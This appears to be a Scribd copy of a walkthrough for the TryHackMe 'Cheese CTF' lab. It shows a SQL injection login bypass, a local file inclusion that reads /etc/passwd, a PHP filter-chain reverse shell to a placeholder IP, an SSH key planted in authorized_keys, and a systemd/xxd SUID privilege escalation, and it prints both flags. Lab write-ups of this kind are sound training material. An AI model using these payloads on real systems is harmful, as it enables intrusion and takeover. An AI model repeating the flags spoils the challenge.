Scribd
Upload
13 views9 pages

Task 1. Flags: Cheese CTF

The document details a Capture The Flag (CTF) challenge involving hacking into a machine to retrieve user and root flags. It outlines the steps taken, including network scanning, web enumeration, SQL injection, local file inclusion, and privilege escalation to gain access to the flags. The user flag is THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a} and the root flag is THM{dca75486094810807faf4b7b0a929b11e5e0167c}.

Uploaded by

vishnuunni635
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
13 views9 pages

Task 1. Flags: Cheese CTF

The document details a Capture The Flag (CTF) challenge involving hacking into a machine to retrieve user and root flags. It outlines the steps taken, including network scanning, web enumeration, SQL injection, local file inclusion, and privilege escalation to gain access to the flags. The user flag is THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a} and the root flag is THM{dca75486094810807faf4b7b0a929b11e5e0167c}.

Uploaded by

vishnuunni635
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Cheese CTF

Task 1. Flags
Hack into the machine and get the flags!

What is the user.txt flag?


THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}

What is the root.txt flag?


THM{dca75486094810807faf4b7b0a929b11e5e0167c}

Let start with Scanning Network.


death@esther:~$ nmap 10.10.228.119 -sV -T 4

PORT STATE SERVICE VERSION


1/tcp open tcpmux?
3/tcp open compressnet?
340/tcp open http Motorola cable modem webadmin
366/tcp open odmr?
389/tcp open telnet Allied Telesis x900-series switch telnetd
406/tcp open melange Melange Chat Server 3VhUqW
407/tcp open pop3-proxy AVG pop3 proxy 346/67007
416/tcp open silverplatter?
417/tcp open onmux?
425/tcp open telnet
427/tcp open telnet
443/tcp open https?
444/tcp open smtp IMail NT-ESMTP ..._.p..c
445/tcp open http Corel Paradox relational database web interface 9.X (Embedded BWS 1.0b3)
458/tcp open printer Microsoft lpd

There are lots of ports open best part is HTTP is open, Let hop to website.

Page 1 of 9
Let Enumerate web directories
dirsearch -u 10.10.228.119
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3


(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25


Wordlist size: 11460

Output File: /home/death/reports/_10.10.228.119/_24-09-28_01-34-24.txt

Target: http://10.10.228.119/

[01:34:24] Starting:
[01:34:33] 403 - 278B - /.ht_wsr.txt
[01:34:33] 403 - 278B - /.htaccess.bak1
[01:34:33] 403 - 278B - /.htaccess.sample
[01:34:33] 403 - 278B - /.htaccess.orig
[01:34:33] 403 - 278B - /.htaccess.save
[01:34:33] 403 - 278B - /.htaccess_orig
[01:34:33] 403 - 278B - /.htaccess_extra
[01:34:33] 403 - 278B - /.htaccessBAK
[01:34:33] 403 - 278B - /.htaccess_sc
[01:34:33] 403 - 278B - /.htaccessOLD2
[01:34:33] 403 - 278B - /.htaccessOLD
[01:34:33] 403 - 278B - /.html
[01:34:33] 403 - 278B - /.htpasswd_test
[01:34:33] 403 - 278B - /.htm
[01:34:33] 403 - 278B - /.htpasswds
[01:34:33] 403 - 278B - /.httr-oauth
[01:34:35] 403 - 278B - /.php
[01:35:14] 301 - 315B - /images -> http://10.10.228.119/images/
[01:35:14] 200 - 485B - /images/
[01:35:18] 200 - 370B - /login.php
[01:35:25] 200 - 254B - /orders.html
[01:35:34] 403 - 278B - /server-status/
[01:35:34] 403 - 278B - /server-status
[01:35:43] 200 - 254B - /users.html

Task Completed

Page 2 of 9
Let Take a look at login page

As We Don't have any info, Let try Sql Injection Maybe we get something.
' || '1'='1';-- -

I got Access

The Website is completly blank,There is Message let tap on it.

There is something

Its a clue

Page 3 of 9
We can see the path http://10.10.228.119/secret-script.php?
file=php://filter/resource=supersecretmessageforadmin Let try
LFI as it a whole path let exploit it

JackPot
http://10.10.228.119/secret-script.php?file=/etc/passwd

Let create a reverse shell.


git clone https://github.com/synacktiv/php_filter_chain_generator.git && cd php_filter_chain_generator && clear && l

python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/PUT-YOUR-IP-HERE/4444

Our Reverse shell is ready

Open Netcat in Another terminal


nc -lnvp 4444

Let send this Payload using curl command


curl "http://10.10.228.119/secret-script.php?file=$(cat payload.txt)"

Here we got our shell

Page 4 of 9
Let EscalatePrivileges

Opening python server on our system.

Let download linpease from our system.

Linpease found /home/comt/.ssh/authorized_keys , which can be modified.


We can create our own SSH key pair on our machine and add the public key to this file
so we are allowimg us to log in.

Page 5 of 9
Let create An SSH key on our system
ssh-keygen -t rsa

Let view the pub key


death@esther:~$ cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0ABrr0Cw

Let Add this to the file


echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0A
" >> /home/comte/.ssh/authorized_keys

Login through SSH


ssh -i id_rsa comte@10.10.228.119

Page 6 of 9
USER FLAG
comte@cheesectf:~$ cat user.txt
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠋⠀⠉⠛⠻⢶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠟⠁⣠⣴⣶⣶⣤⡀⠈⠉⠛⠿⢶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡿⠃⠀⢰⣿⠁⠀⠀⢹⡷⠀⠀⠀⠀⠀⠈⠙⠻⠷⣶⣤⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠋⠀⠀⠀⠈⠻⠷⠶⠾⠟⠁⠀⠀⣀⣀⡀⠀⠀⠀⠀⠀⠉⠛⠻⢶⣦⣄⡀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠁⠀⠀⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⣼⠟⠛⢿⡆⠀⠀⠀⠀⠀⣀⣤⣶⡿⠟⢿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠋⠀⠀⣴⡿⠛⠛⠛⠛⣿⡄⠀⠀⠀⠀⠻⣶⣶⣾⠇⢀⣀⣤⣶⠿⠛⠉⠀⠀⠀⢸⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠟⠀⠀⠀⠀⢿⣦⡀⠀⠀⠀⣹⡇⠀⠀⠀⠀⠀⣀⣤⣶⡾⠟⠋⠁⠀⠀⠀⠀⠀⣠⣴⠾⠇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⡿⠁⠀⠀⠀⠀⠀⠀⠙⠻⠿⠶⠾⠟⠁⢀⣀⣤⡶⠿⠛⠉⠀⣠⣶⠿⠟⠿⣶⡄⠀⠀⣿⡇⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⠟⢁⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⠾⠟⠋⠁⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⣼⡇⠀⠀⠙⢷⣤⡀
⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⣾⡏⢻⣷⠀⠀⠀⢀⣠⣴⡶⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⣷⣤⣤⣴⡟⠀⠀⠀⠀⠀⢻⡇
⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⠀⠀⠙⠛⢛⣋⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠁⠀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⠀⠀⣠⣾⠟⠁⠀⢀⣀⣤⣤⡶⠾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣤⣤⣤⣤⡀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⣠⣾⣿⣥⣶⠾⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⠶⣶⣤⣀⠀⠀⠀⠀⠀⢠⡿⠋⠁⠀⠀⠀⠈⠉⢻⣆⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠛⠉⠁⠀⢀⣠⣴⣶⣦⣀⠀⠀⠀⠀⠀⠀⠀⣠⡿⠋⠀⠀⠀⠉⠻⣷⡀⠀⠀⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠘⣿⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠀⠀⠀⣴⡟⠋⠀⠀⠈⢻⣦⠀⠀⠀⠀⠀⢰⣿⠁⠀⠀⠀⠀⠀⠀⢸⣷⠀⠀⠀⢻⣧⠀⠀⠀⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⢿⡆⠀⠀⠀⠀⢰⣿⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⣸⡟⠀⠀⠀⠀⠙⢿⣦⣄⣀⣀⣠⣤⡾⠋⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⠘⣿⣄⣀⣠⣴⡿⠁⠀⠀⠀⠀⠀⠀⢿⣆⠀⠀⠀⢀⣠⣾⠟⠁⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠀⠀⠀⣀⣤⣴⠿⠃
⠀⠸⣷⡄⠀⠀⠀⠈⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⠿⠿⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⡶⠟⠋⠉⠀⠀⠀
⠀⠀⠈⢿⣆⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣶⣶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢨⣿⠀⠀⠀⠀⠀⠀⣼⡟⠁⠀⠀⠀⠹⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣠⡾⠋⠀⠀⠀⠀⠀⠀⢻⣇⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⢠⣾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣤⣤⣤⣴⡿⠃⠀⠀⣀⣤⣶⠾⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⣀⣠⣴⡾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⡇⠀⠀⠀⠀⣀⣤⣴⠾⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢻⣧⣤⣴⠾⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠘⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}

Let see comte’s privilege.


Page 7 of 9
comte@cheesectf:~$ sudo -l
User comte may run the following commands on cheesectf:
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer
comte@cheesectf:~$

We can execute systemctl and modify a file called exploit.timer , which can be
used to run an exploit service

Let view this file

comte@cheesectf:/etc/systemd/system$ cat exploit.service

[Unit]
Description=Exploit Service

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"

The service will trigger xxd

Let view timer file


comte@cheesectf:/etc/systemd/system$ cat exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=

[Install]
WantedBy=timers.target
comte@cheesectf:/etc/systemd/system$

Let set time to it

Page 8 of 9
It will trigger xxd when we run it, if u dont no about xxd its an binarry function we can
read about it on gtfobins

According to this we can get simply root privileges writting the ssh key we generated
with access to the xxd binary.

First let run this service


sudo systemctl daemon-reload

sudo systemctl start exploit.time

Let write our ssh key with xxd


echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0A

Let login with ssh


ssh -i id_rsa root@10.10.228.119

ROOT FLAG
root@cheesectf:~# cat /root/root.txt
_ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|

THM{dca75486094810807faf4b7b0a929b11e5e0167c}

Page 9 of 9

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy